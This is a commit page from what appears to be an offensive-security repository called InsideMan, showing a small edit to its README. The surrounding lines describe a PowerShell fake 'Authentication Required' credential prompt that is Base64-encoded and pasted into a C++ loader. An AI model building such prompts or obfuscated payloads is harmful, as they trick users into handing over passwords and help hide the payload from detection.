瀏覽代碼

Update README.md

assume-breach 3 年之前
父節點
當前提交
f8367d9c25
共有 1 個文件被更改,包括 1 次插入1 次删除
  1. 1 1
      InsideMan/README.md

+ 1 - 1
InsideMan/README.md

@@ -18,7 +18,7 @@ $str= '$sessionCredential = $host.ui.PromptForCredential("Authentication Require
 
 2.) Translate To Base64
 
-[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
+'[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))'
 
 3.) Paste Base64 Output to Base64 String In InsideMan.cpp